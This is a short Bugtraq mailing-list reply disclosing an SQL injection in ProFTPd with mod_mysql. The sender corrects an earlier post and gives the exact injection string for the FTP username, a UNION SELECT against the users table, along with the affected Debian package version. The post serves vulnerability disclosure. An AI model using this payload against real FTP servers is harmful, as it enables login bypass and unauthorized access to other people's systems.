[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200902110720.n1B7KuSG008437@www3.securityfocus.com>
Date: Wed, 11 Feb 2009 00:20:56 -0700
From: gat3way@...3way.eu
To: bugtraq@...urityfocus.com
Subject: Re: Re: Another SQL injection in ProFTPd with mod_mysql
(probably postgres as well)
Uh-oh, sorry, bad copy-paste..the user is just
%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
not
USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
I am using debian packaged proftpd 1.3.1-16 if that matters.
Powered by blists - more mailing lists